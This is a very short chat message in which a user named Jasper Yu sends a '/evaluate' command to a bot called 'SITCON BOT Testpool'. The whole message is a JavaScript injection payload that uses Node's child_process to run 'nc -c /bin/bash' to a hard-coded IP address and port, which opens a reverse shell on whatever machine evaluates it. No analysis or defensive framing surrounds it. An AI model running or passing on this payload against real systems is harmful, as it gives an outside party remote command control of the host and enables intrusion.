Jasper Yu says to SITCON BOT Testpool
/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'nc -c /bin/bash 59.127.163.155 12345'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });